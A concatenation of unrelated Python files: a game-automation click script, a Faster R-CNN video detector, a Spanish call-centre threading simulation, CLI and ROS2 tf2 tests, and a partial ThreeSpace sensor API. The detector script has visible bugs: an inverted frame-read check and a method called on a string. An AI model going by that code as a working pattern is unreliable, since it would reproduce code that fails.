self.device.click(0.048, 0.726)
time.sleep(5)
self.device.click(0.214, 0.294)
time.sleep(5)
self.device.click(0.248, 0.322)
time.sleep(5)
self.device.click(0.206, 0.294)
time.sleep(5)
self.device.click(0.104, 0.581)
time.sleep(5)
self.device.click(0.146, 0.762)
time.sleep(5)
self.device.click(0.264, 0.343)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(5)
self.device.click(0.606, 0.439)
time.sleep(12)
print("""进入副本开刷""")
self.device.click(0.208, 0.258)
time.sleep(5)
self.device.click(0.712, 0.248)
time.sleep(5)
self.device.click(0.72, 0.237)
time.sleep(5)
self.device.click(0.66, 0.294)
time.sleep(5)
self.device.click(0.378, 0.237)
time.sleep(5)
self.device.click(0.656, 0.496)
time.sleep(5)
self.device.click(0.656, 0.393)
time.sleep(5)
self.device.click(0.434, 0.691)
time.sleep(5)
self.device.click(0.604, 0.429)
time.sleep(12)
print("""回泰山""")
self.device.click(0.208, 0.946)
time.sleep(2)
self.device.click(0.292, 0.815)
time.sleep(2)
self.device.click(0.594, 0.294)
time.sleep(2)
self.device.click(0.456, 0.549)
time.sleep(6)
print("-----------------铁刃门完成--------------------")
def yi_jian(self):
print("-----------一键任务开始运行--------------")
self.sai_bei()
self.yan_wang()
self.ku_gu()
self.tian_yi()
self.tie_ren()
print("-----------一键任务运行结束--------------")
@staticmethod
def thread_it(func, *args):
"""多线程防止阻塞"""
t = threading.Thread(target=func, args=args)
t.setDaemon(True) # 守护
t.start() # 启动
if __name__ == '__main__':
app = MainWindow()
app.mainloop()
|
hcar_v.py
|
#! /usr/bin/env python
from __future__ import print_function
import argparse
import os
import cv2
import cv2.cv as cv
import time
import Queue
import thread
from threading import Thread
from skvideo.io import VideoWriter
import mxnet as mx
import numpy as np
from rcnn.config import config
from rcnn.symbol import get_vggm_test, get_vggm_rpn_test
from rcnn.symbol import get_vgg_test, get_vgg_rpn_test
from rcnn.io.image import resize, transform
from rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection
from rcnn.utils.load_model import load_param
from rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper
CLASSES = ('__background__',
'car', 'coach','truck','person','tanker')
config.TEST.HAS_RPN = True
SHORT_SIDE = config.SCALES[0][0]
LONG_SIDE = config.SCALES[0][1]
PIXEL_MEANS = config.PIXEL_MEANS
DATA_NAMES = ['data', 'im_info']
LABEL_NAMES = None
DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]
LABEL_SHAPES = None
# visualization
CONF_THRESH = 0.8
NMS_THRESH = 0.3
nms = py_nms_wrapper(NMS_THRESH)
def get_net(symbol, prefix, epoch, ctx):
arg_params, aux_params = load_param(prefix, epoch, convert=True, ctx=ctx, process=True)
# infer shape
data_shape_dict = dict(DATA_SHAPES)
arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()
arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)
arg_shape_dict = dict(zip(arg_names, arg_shape))
aux_shape_dict = dict(zip(aux_names, aux_shape))
# check shapes
for k in symbol.list_arguments():
if k in data_shape_dict or 'label' in k:
continue
assert k in arg_params, k + ' not initialized'
assert arg_params[k].shape == arg_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(arg_shape_dict[k]) + ' provided ' + str(arg_params[k].shape)
for k in symbol.list_auxiliary_states():
assert k in aux_params, k + ' not initialized'
assert aux_params[k].shape == aux_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(aux_shape_dict[k]) + ' provided ' + str(aux_params[k].shape)
predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,
provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,
arg_params=arg_params, aux_params=aux_params)
return predictor
def generate_batch(im):
"""
preprocess image, return batch
:param im: cv2.imread returns [height, width, channel] in BGR
:return:
data_batch: MXNet input batch
data_names: names in data_batch
im_scale: float number
"""
im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)
im_array = transform(im_array, PIXEL_MEANS)
im_info = np.array([[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)
data = [mx.nd.array(im_array), mx.nd.array(im_info)]
data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]
data_batch = mx.io.DataBatch(data=data, label=None, provide_data=data_shapes, provide_label=None)
return data_batch, DATA_NAMES, im_scale
def demo_net(predictor, image_name, args):
"""
generate data_batch -> im_detect -> post process
:param predictor: Predictor
:param image_name: image name
:param vis: will save as a new image if not visualized
:return: None
"""
assert os.path.exists(image_name), image_name + ' not found'
im = cv2.imread(image_name)
data_batch, data_names, im_scale = generate_batch(im)
#for i in range(10):
# scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
t0 = time.clock()
for i in range(1):
scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
print(time.clock() - t0)
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
# print results
print('class ---- [[x1, x2, y1, y2, confidence]]')
for ind, boxes in enumerate(boxes_this_image):
if len(boxes) > 0:
print('---------', CLASSES[ind], '---------')
print(boxes)
if args.vis:
vis_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
else:
#print(os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1]))
result_file = os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1])
print('results saved to %s' % result_file)
im = draw_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
cv2.imwrite(result_file, im)
def parse_args():
parser = argparse.ArgumentParser(description='Demonstrate a Faster R-CNN network')
parser.add_argument('--prefix', help='saved model prefix', type=str)
parser.add_argument('--epoch', help='epoch of pretrained model', type=int)
parser.add_argument('--gpu', help='GPU device to use', default=0, type=int)
parser.add_argument('--network', help='network to use', default='vgg', type=str)
parser.add_argument('--in_video', help='input video', type=str)
parser.add_argument('--out', help='output video', type=str)
args = parser.parse_args()
return args
def read_video(args, queue):
cap = cv2.VideoCapture(args.in_video)
while True:
ret, im = cap.read()
if ret:
print('read_video finish...')
queue.put(None)
cap.release()
break
data_batch, data_names, im_scale = generate_batch(im)
queue.put([im, data_batch, data_names, im_scale])
print('Hello1')
def detect(pred, args, im_queue, rst_queue):
while True:
im_item = im_queue.get()
if not im_item:
print('detect finish...')
rst_queue.put(None)
break
im, data_batch, data_names, im_scale = im_item
t0 = time.clock()
scores, boxes, data_dict = im_detect(pred, data_batch, data_names, im_scale)
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
print('detect:', time.clock() - t0)
rst_queue.put([data_dict['data'.asnumpy], boxes_this_image, im_scale])
print('Hello2')
def draw(args, queue):
#cap = cv2.VideoCapture(args.in_video)
#cat = cv2.VideoWriter(args.out, fourcc=cv.CV_FOURCC(*"MJPG"), fps=cap.get(cv.CV_CAP_PROP_FPS), frameSize=(int(cap.get(cv.CV_CAP_PROP_FRAME_WIDTH)), int(cap.get(cv.CV_CAP_PROP_FRAME_HEIGHT))), isColor=True)
#cap.release()
while True:
item = queue.get()
if not item:
print('draw finish...')
break
data_dict, boxes_this_image, im_scale = item
im = draw_all_detection(data_dict, boxes_this_image, CLASSES, im_scale)
print('write: ', time.clock())
#cat.write(im)
#cat.release()
print('Hello3')
def main():
print(cv2.__version__)
args = parse_args()
ctx = mx.gpu(args.gpu)
symbol = eval('get_' + args.network + '_test')(num_classes=config.NUM_CLASSES, num_anchors=config.NUM_ANCHORS)
predictor = get_net(symbol, args.prefix, args.epoch, ctx)
im_queue = Queue.Queue(maxsize=1)
rst_queue = Queue.Queue(maxsize=1)
threads = []
threads.append(Thread(target=read_video, args=(args, im_queue)))
threads.append(Thread(target=detect, args=(predictor, args, im_queue, rst_queue)))
threads.append(Thread(target=draw, args=(args, rst_queue)))
for t in threads: t.start()
for t in threads: t.join()
print('Finish')
if __name__ == '__main__':
main()
|
Proyecto1_CentrodeLlamadas.py
|
#@author: Carlos Mendoza
#Problema Centro de llamadas telefonicas HELP
#Se considera que un promedio de 10 telefonos en uso por hora
#Por lo cual son hay disponibilidad de 10 telefonos
#Uso de las bibliotecas Threading para el manejo de los hilos, random para el uso del azar
#y time para el uso del tiempo
from threading import Barrier,Thread,Semaphore
import random
import time
#Funcion ingreso donde ingresa los hilos (llamadas) en cual se lleva el registro
#Asi como la frecuencia revision de los telefonos disponibles
def ingresos(num):
global mut_ingreso,telefonos,llamadasEntrante #Variables globales a ocupar
while True:
llamadasEntrante.acquire()
mut_ingreso.acquire()
print(" Sonando el telefono, Rinrinrin")
time.sleep(3)
print("Llegando la llamada")
time.sleep(3)
mut_ingreso.release()
mut_ingreso.acquire()
print("Atendiendo una llamada en el telefono num.",num)
telefonos.append(1)
time.sleep(5)
mut_ingreso.release()
#llamadasEntrante.release()
mut_ingreso.acquire()
print("Los telefonos ocupados")
time.sleep(10)
mut_ingreso.release()
mut_ingreso.acquire()
print("Se tienen atendiendo ",max_ingreso.n_waiting+1, "llamadas en este momento")#NOs da el numero de hilos
print("Telefonos ocupados son",len(telefonos))
time.sleep(5)
mut_ingreso.release()
llamadasEntrante.release()
max_ingreso.wait()#Barrera que espera 10 hilos, teniendo en cuenta la restriccion
if len(telefonos)==10:
mut_ingreso.acquire()
print("Llamadas en espera, se espera terminar la llamada en los telefonos")
time.sleep(3)
del telefonos[:]
print("Por ahora no tenemos llamadas",telefonos, "se liberon los telefonos ")
time.sleep(3)
mut_ingreso.release()
#Funcion en cual se lleva acabo la solicitud del servicio o todavia seguir atendiendo la llamada
#En funcion de los hilos entrantes
def egreso(num):
global mut_egreso,ayuda,mut_ingreso
while True:
mut_ingreso.acquire()
if ayuda==random.randint(3,7):#Probabilidad aleatoria para solicitar un servicio
#mut_ingreso.acquire()
mut_egreso.acquire()
print("Llamando a" ,str(random.choice(servicios)))
print("Va en camino, a rescate")
time.sleep(3)
mut_egreso.release()
llamadasEntrante.release()
mut_ingreso.release()
mut_egreso.acquire()
print(" Se sigue atendiendo la llamada entrante ")
time.sleep(random.randint(4,7))
mut_egreso.release()
llamadasEntrante.acquire()
#Hilo Main en donde se llamara los hilos de llamadas, en funcion de ingreso y egreso
#Asi como la comparacion de la disponibilidad de los telefonos
def main():
global llamadasEntrante, mut_ocupa #Variables globales a usar
while True:
#mut_ingreso.acquire()
telefonosDisp=10-len(telefonos)#
print("Los telefonos disponibles son ",telefonosDisp)
print("Telefonos ", telefonos, "ocupados ", len(telefonos))#Representacion de 1, que indica como se va ocupando los telefonos
mut_ocupa.release()
nuevoIngt.release()
llamadasEntrante.release()
print("Esperando llamada")
time.sleep(5)
parametros=random.randint(11, 15)
for num_llamadas in range(1,parametros):
Thread(target=ingresos,args=[num_llamadas]).start()
for num_Egreso in range(1,parametros):
Thread(target=egreso,args=[num_Egreso]).start()
#Nuestra variables que seran usadas durante el prograama
#Ayuda es la probabilidad definada para llamar a los servicios
ayuda=5
#Semaforos y mutex que se le asigna a los hilos, dando la fluidez del programa
mut_ocupa=Semaphore(1)
llamadasEntrante=Semaphore(0)
nuevoIngt=Semaphore(0)
mut_egreso=Semaphore(1)
mut_ingreso=Semaphore(1)
#Barrera que detendra 10 hilos, limite que se tiene considerado
max_ingreso=Barrier(10)
#Lista de servicios que se brinda
servicios=["Policias","Bomberos","Ambulancia"]
#Lista donde nos inidcara la disponibilidad y el uso de los telefonos
telefonos=[]
Thread(target=main,args=[]).start()
|
test_config_cli.py
|
import time
from multiprocessing import Process
import pytest
from click.testing import CliRunner
from panoptes.utils.config.cli import config_server_cli
@pytest.fixture(scope='module')
def runner():
return CliRunner()
@pytest.fixture(scope='module')
def cli_config_port():
return 12345
@pytest.mark.skip("Not working")
def test_cli_server(runner, config_path, cli_config_port):
def run_cli():
result = runner.invoke(config_server_cli,
[
'--verbose',
'run',
'--config-file', f'{config_path}',
'--port', cli_config_port,
'--no-save-local',
'--no-load-local'
])
assert result.exit_code == 0
proc = Process(target=run_cli)
proc.start()
assert proc.pid
# Let the serve start.
time.sleep(5)
result = runner.invoke(config_server_cli, ['--verbose', '--port', f'{cli_config_port}', 'get', f'name', ])
assert result.exit_code == 0
# Ugh. I hate this. Logger is interfering in annoying ways.
assert result.stdout.endswith("Testing PANOPTES Unit\n")
proc.terminate()
proc.join(30)
@pytest.mark.skip("Not working")
def test_config_server_cli(runner, cli_server, cli_config_port):
result = runner.invoke(config_server_cli, ['--verbose', '--port', f'{cli_config_port}', 'get', f'name'])
assert result.exit_code == 0
# Ugh. I hate this. Logger is interfering in annoying ways.
assert result.stdout.endswith("Testing PANOPTES Unit\n")
# Set the name.
result = runner.invoke(config_server_cli, ['--port', f'{cli_config_port}', 'set', f'name', f'foobar'])
assert result.exit_code == 0
assert result.stdout.endswith("\n{'name': 'foobar'}\n")
# Get the name.
result = runner.invoke(config_server_cli, ['--port', f'{cli_config_port}', 'get', f'name'])
assert result.exit_code == 0
assert result.stdout.endswith("\nfoobar\n")
|
test_buffer_client.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Willow Garage nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import unittest
import rclpy
import threading
from tf2_ros.buffer_client import BufferClient
from geometry_msgs.msg import TransformStamped
from tf2_msgs.action import LookupTransform
from tf2_py import BufferCore, TransformException, TimeoutException, \
LookupException, InvalidArgumentException, ExtrapolationException, ConnectivityException
from rclpy.executors import SingleThreadedExecutor
from tf2_msgs.msg import TF2Error
def build_transform(target_frame, source_frame, stamp):
transform = TransformStamped()
transform.header.frame_id = target_frame
transform.header.stamp = stamp
transform.child_frame_id = source_frame
transform.transform.translation.x = 42.0
transform.transform.translation.y = -3.14
transform.transform.translation.z = 0.0
transform.transform.rotation.w = 1.0
transform.transform.rotation.x = 0.0
transform.transform.rotation.y = 0.0
transform.transform.rotation.z = 0.0
return transform
class MockActionServer():
def __init__(self, node, buffer_core):
self.goal_srv = node.create_service(
LookupTransform.Impl.SendGoalService, '/lookup_transform/_action/send_goal',
self.goal_callback)
self.cancel_srv = node.create_service(
LookupTransform.Impl.CancelGoalService, '/lookup_transform/_action/cancel_goal',
self.cancel_callback)
self.result_srv = node.create_service(
LookupTransform.Impl.GetResultService, '/lookup_transform/_action/get_result',
self.result_callback)
self.feedback_pub = node.create_publisher(
LookupTransform.Impl.FeedbackMessage, '/lookup_transform/_action/feedback', 1)
self.node = node
self.buffer_core = buffer_core
self.result_buffer = {}
def goal_callback(self, request, response):
response.accepted = True
bytes_goal_id = bytes(request.goal_id.uuid)
try:
if not request.goal.advanced:
transform = self.buffer_core.lookup_transform_core(target_frame=request.goal.target_frame,
source_frame=request.goal.source_frame,
time=request.goal.source_time)
self.result_buffer[bytes_goal_id] = (
transform, TF2Error.NO_ERROR, '')
else:
transform = self.buffer_core.lookup_transform_full_core(
target_frame=request.goal.target_frame,
source_frame=request.goal.source_frame,
source_time=request.goal.source_time,
target_time=request.goal.target_time,
fixed_frame=request.goal.fixed_frame
)
self.result_buffer[bytes_goal_id] = (
transform, TF2Error.NO_ERROR, ''
)
except TimeoutException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.TIMEOUT_ERROR, e)
except LookupException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.LOOKUP_ERROR, e)
except InvalidArgumentException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.INVALID_ARGUMENT_ERROR, e)
except ExtrapolationException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.EXTRAPOLATION_ERROR, e)
except ConnectivityException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.CONNECTIVITY_ERROR, e)
except TransformException as e:
self.result_buffer[bytes_goal_id] = (
TransformStamped(), TF2Error.TRANSFORM_ERROR, e)
return response
def cancel_callback(self, request, response):
response.goals_canceling.append(request.goal_info)
return response
def result_callback(self, request, response):
bytes_goal_id = bytes(request.goal_id.uuid)
response.result.transform = self.result_buffer[bytes_goal_id][0]
response.result.error = TF2Error(
error=self.result_buffer[bytes_goal_id][1],
error_string=str(self.result_buffer[bytes_goal_id][2]))
return response
def publish_feedback(self, goal_id):
feedback_message = LookupTransform.Impl.FeedbackMessage()
feedback_message.goal_id = goal_id
self.feedback_pub.publish(feedback_message)
class TestBufferClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.context = rclpy.context.Context()
rclpy.init(context=cls.context)
cls.executor = SingleThreadedExecutor(context=cls.context)
cls.node = rclpy.create_node('TestBufferClient', context=cls.context)
cls.executor.add_node(cls.node)
buffer_core = BufferCore()
transform = build_transform('foo', 'bar', rclpy.time.Time().to_msg())
buffer_core.set_transform(transform, 'unittest')
cls.mock_action_server = MockActionServer(cls.node, buffer_core)
@classmethod
def tearDownClass(cls):
cls.node.destroy_node()
rclpy.shutdown(context=cls.context)
def setUp(self):
self.spinning = threading.Event()
self.spin_thread = threading.Thread(target=self.spin)
self.spin_thread.start()
return
def tearDown(self):
self.spinning.set()
self.spin_thread.join()
return
def feedback_callback(self, feedback):
self.feedback = feedback
def spin(self):
try:
while self.context.ok() and not self.spinning.is_set():
self.executor.spin_once(timeout_sec=0.05)
finally:
return
def timed_spin(self, duration):
start_time = time.time()
while (time.time() - start_time) < duration:
rclpy.spin_once(self.node, executor=self.executor, timeout_sec=0.1)
def execute_goal_callback(self, goal_handle):
print('execute_goal_callback')
goal_handle.set_succeeded()
return LookupTransform.Result()
def test_lookup_transform_true(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
result = buffer_client.lookup_transform(
'foo', 'bar', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(build_transform(
'foo', 'bar', rclpy.time.Time().to_msg()), result)
def test_lookup_transform_fail(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
with self.assertRaises(LookupException) as ex:
result = buffer_client.lookup_transform(
'bar', 'baz', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(LookupException, type(ex.exception))
if __name__ == '__main__':
unittest.main()
|
threespace_api.py
|
#!/usr/bin/env python2.7
from __future__ import print_function
""" This module is an API module for ThreeSpace devices.
The ThreeSpace API module is a collection of classes, functions, structures,
and static variables use exclusivly for ThreeSpace devices. This module can
be used with a system running Python 2.5 and newer (including Python 3.x).
"""
__version__ = "2.0.2.3"
__authors__ = [
'"Chris George" <cgeorge@yeitechnology.com>',
'"Dan Morrison" <dmorrison@yeitechnology.com>',
]
import threading
import sys
import serial
import struct
import collections
import traceback
import time
import os
# chose an implementation, depending on os
if os.name == 'nt': # sys.platform == 'win32':
from win32_threespace_utils import *
else:
from threespace_utils import *
print("WARNING: No additional utils are loaded!!!!!!")
### Globals ###
global_file_path = os.getcwd()
global_error = None
global_counter = 0
global_donglist = {}
global_sensorlist = {}
global_broadcaster = None
TSS_TIMESTAMP_SENSOR = 0
TSS_TIMESTAMP_SYSTEM = 1
TSS_TIMESTAMP_NONE = 2
TSS_JOYSTICK = 0
TSS_MOUSE = 2
TSS_BUTTON_LEFT = 0
TSS_BUTTON_RIGHT = 1
### Private ###
_baudrate = 115200
_allowed_baudrates = [1200, 2400, 4800, 9600, 19200, 28800, 38400, 57600, 115200, 230400, 460800, 921600]
_wireless_retries = 5
### Functions ###
if sys.version_info >= (3, 0):
def makeWriteArray(startbyte, index_byte=None, command_byte=None, data=None):
rtn_array = bytearray((startbyte,))
if index_byte is not None:
rtn_array.append(index_byte)
if command_byte is not None:
rtn_array.append(command_byte)
if data is not None:
rtn_array += data
rtn_array.append((sum(rtn_array) - startbyte) % 256) # checksum
_hexDump(rtn_array)
return rtn_array
else:
def makeWriteArray(startbyte, index_byte=None, command_byte=None, data=None):
rtn_array = chr(startbyte)
if index_byte is not None:
rtn_array += chr(index_byte)
if command_byte is not None:
rtn_array += chr(command_byte)
if data is not None:
rtn_array += data
rtn_array += chr((sum(bytearray(rtn_array)) - startbyte) % 256) # checksum
_hexDump(rtn_array)
return rtn_array
def _hexDump(serial_string, header='i'):
if "-d_hex" in sys.argv:
ba = bytearray(serial_string)
print('{0}('.format(header), end='')
for i in range(len(ba)):
if i == len(ba)-1:
print('0x{0:02x}'.format(ba[i]), end='')
else:
print('0x{0:02x},'.format(ba[i]), end='')
print(')')
def _print(string):
if "-d" in sys.argv:
print(string)
def _echoCallback(sensor, state):
_print('{0}:{1}'.format(sensor, state))
def _generateProtocolHeader(success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
byte = 0
struct_str = '>'
idx_list = []
if success_failure:
byte += 0x1
struct_str += '?'
idx_list.append(0)
if timestamp:
byte += 0x2
struct_str += 'I'
idx_list.append(1)
if command_echo:
byte += 0x4
struct_str += 'B'
idx_list.append(2)
if checksum:
byte += 0x8
struct_str += 'B'
idx_list.append(3)
if logical_id:
byte += 0x10
struct_str += 'B'
idx_list.append(4)
if serial_number:
byte += 0x20
struct_str += 'I'
idx_list.append(5)
if data_length:
byte += 0x40
struct_str += 'B'
idx_list.append(6)
return (byte, struct.Struct(struct_str), idx_list)
def _generateSensorClass(sensor_inst, serial_port, allowed_device_types):
sensor_inst.compatibility = checkSoftwareVersionFromPort(serial_port)
sensor_inst.port_name = serial_port.name
sensor_inst.serial_port_settings = serial_port.getSettingsDict()
sensor_inst.serial_port = serial_port
hardware_version = convertString(sensor_inst.f7WriteRead('getHardwareVersionString'))
dev_type = hardware_version[4:-8].strip()
if dev_type not in allowed_device_types:
raise Exception("This is a %s device, not one of these devices %s!" % (dev_type, allowed_device_types))
sensor_inst.device_type = dev_type
serial_number = sensor_inst.f7WriteRead('getSerialNumber')
sensor_inst.serial_number = serial_number
if dev_type == "DNG":
if serial_number in global_donglist:
rtn_inst = global_donglist[serial_number]
rtn_inst.close()
rtn_inst.compatibility = sensor_inst.compatibility
rtn_inst.port_name = serial_port.name
rtn_inst.serial_port_settings = serial_port.getSettingsDict()
rtn_inst.serial_port = serial_port
return rtn_inst
global_donglist[serial_number] = sensor_inst
else:
if serial_number in global_sensorlist:
rtn_inst = global_sensorlist[serial_number]
rtn_inst.close()
rtn_inst.compatibility = sensor_inst.compatibility
rtn_inst.port_name = serial_port.name
rtn_inst.serial_port_settings = serial_port.getSettingsDict()
rtn_inst.serial_port = serial_port
if "BT" in dev_type:
rtn_inst.serial_port.timeout = 1.5
rtn_inst.serial_port.writeTimeout = 1.5
if "WL" in dev_type:
rtn_inst.switchToWiredMode()
return rtn_inst
if "BT" in dev_type:
sensor_inst.serial_port.timeout = 1.5
sensor_inst.serial_port.writeTimeout = 1.5
elif "WL" in dev_type:
sensor_inst.switchToWiredMode()
global_sensorlist[serial_number] = sensor_inst
return sensor_inst
def parseAxisDirections(axis_byte):
axis_order_num = axis_byte & 7
if axis_order_num == 0:
axis_order = "XYZ"
elif axis_order_num == 1:
axis_order = "XZY"
elif axis_order_num == 2:
axis_order = "YXZ"
elif axis_order_num == 3:
axis_order = "YZX"
elif axis_order_num == 4:
axis_order = "ZXY"
elif axis_order_num == 5:
axis_order = "ZYX"
else:
raise ValueError
neg_x = neg_y = neg_z = False
if (axis_byte & 32) > 0:
neg_x = True
if (axis_byte & 16) > 0:
neg_y = True
if (axis_byte & 8) > 0:
neg_z = True
return axis_order, neg_x, neg_y, neg_z
def generateAxisDirections(axis_order, neg_x=False, neg_y=False, neg_z=False):
axis_order = axis_order.upper()
if axis_order == "XYZ":
axis_byte = 0
elif axis_order == "XZY":
axis_byte = 1
elif axis_order == "YXZ":
axis_byte = 2
elif axis_order == "YZX":
axis_byte = 3
elif axis_order == "ZXY":
axis_byte = 4
elif axis_order == "ZYX":
axis_byte = 5
else:
raise ValueError
if neg_x:
axis_byte = axis_byte | 32
if neg_y:
axis_byte = axis_byte | 16
if neg_z:
axis_byte = axis_byte | 8
return axis_byte
def getSystemWirelessRetries():
return _wireless_retries
def setSystemWirelessRetries(retries):
global _wireless_retries
_wireless_retries = retries
def getDefaultCreateDeviceBaudRate():
return _baudrate
def setDefaultCreateDeviceBaudRate(new_baudrate):
global _baudrate
if new_baudrate in _allowed_baudrates:
_baudrate = new_baudrate
def padProtocolHeader69(header_data, sys_timestamp):
fail_byte, cmd_echo, data_size = header_data
return (fail_byte, sys_timestamp, cmd_echo, None, None, None, data_size)
def padProtocolHeader71(header_data):
fail_byte, timestamp, cmd_echo, data_size = header_data
return (fail_byte, timestamp, cmd_echo, None, None, None, data_size)
def padProtocolHeader85(header_data, sys_timestamp):
fail_byte, cmd_echo, rtn_log_id, data_size = header_data
return (fail_byte, sys_timestamp, cmd_echo, None, rtn_log_id, None, data_size)
def padProtocolHeader87(header_data):
fail_byte, timestamp, cmd_echo, rtn_log_id, data_size = header_data
return (fail_byte, timestamp, cmd_echo, None, rtn_log_id, None, data_size)
### Classes ###
class Broadcaster(object):
def __init__(self):
self.retries = 10
def setRetries(self, retries=10):
self.retries = retries
def sequentialWriteRead(self, command, input_list=None, filter=None):
if filter is None:
filter = list(global_sensorlist.values())
val_list = {}
for i in range(self.retries):
for sensor in reversed(filter):
packet = sensor.writeRead(command, input_list)
if packet[0]: # fail_byte
continue
val_list[sensor.serial_number] = packet
filter.remove(sensor)
if not filter:
break
# _print("##Attempt: {0} complete".format(i))
else:
# _print("sensor failed to succeed")
for sensor in filter:
val_list[sensor.serial_number] = (True, None, None)
return val_list
def writeRead(self, command, input_list=None, filter=None):
q = TSCommandQueue()
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
q.queueWriteRead(sensor, sensor.serial_number, self.retries, command, input_list)
return q.proccessQueue()
def _broadcastMethod(self, filter, method, default=None, *args):
# _print(filter)
if filter is None:
filter = list(global_sensorlist.values())
val_list = {}
for i in range(self.retries):
for sensor in reversed(filter):
packet = getattr(sensor, method)(*args)
if packet is default: # fail_byte
continue
val_list[sensor.serial_number] = packet
filter.remove(sensor)
if not filter:
break
# _print("##Attempt: {0} complete".format(i))
else:
# _print("sensor failed to succeed")
for sensor in filter:
val_list[sensor.serial_number] = default
return val_list
def broadcastMethod(self, method, default=None, args=[], filter=None, callback_func=None):
q = TSCommandQueue()
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
q.queueMethod( getattr(sensor, method),
sensor,
self.retries,
default,
args,
callback_func)
return q.proccessQueue()
def setStreamingSlots(self, slot0='null',
slot1='null',
slot2='null',
slot3='null',
slot4='null',
slot5='null',
slot6='null',
slot7='null',
filter=None,
callback_func=None):
args = (slot0, slot1, slot2, slot3, slot4, slot5, slot6, slot7)
return self.broadcastMethod('setStreamingSlots', False, args, filter, callback_func)
def getStreamingSlots(self, filter=None, callback_func=None):
return self.broadcastMethod('getStreamingSlots', None, [], filter, callback_func)
def startStreaming(self, record_data=False, filter=None, callback_func=None):
return self.broadcastMethod('startStreaming', False, [record_data], filter, callback_func)
def stopStreaming(self, filter=None, callback_func=None):
return self.broadcastMethod('stopStreaming', False, [], filter, callback_func)
def setStreamingTiming(self, interval, duration, delay, delay_offset, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
else:
filter = list(filter)
val_list = {}
for sensor in reversed(filter):
success = False
for i in range(self.retries):
if sensor.setStreamingTiming(interval, duration, delay):
if callback_func is not None:
callback_func(sensor, True)
success = True
break
# _print("##Attempt: {0} complete".format(i))
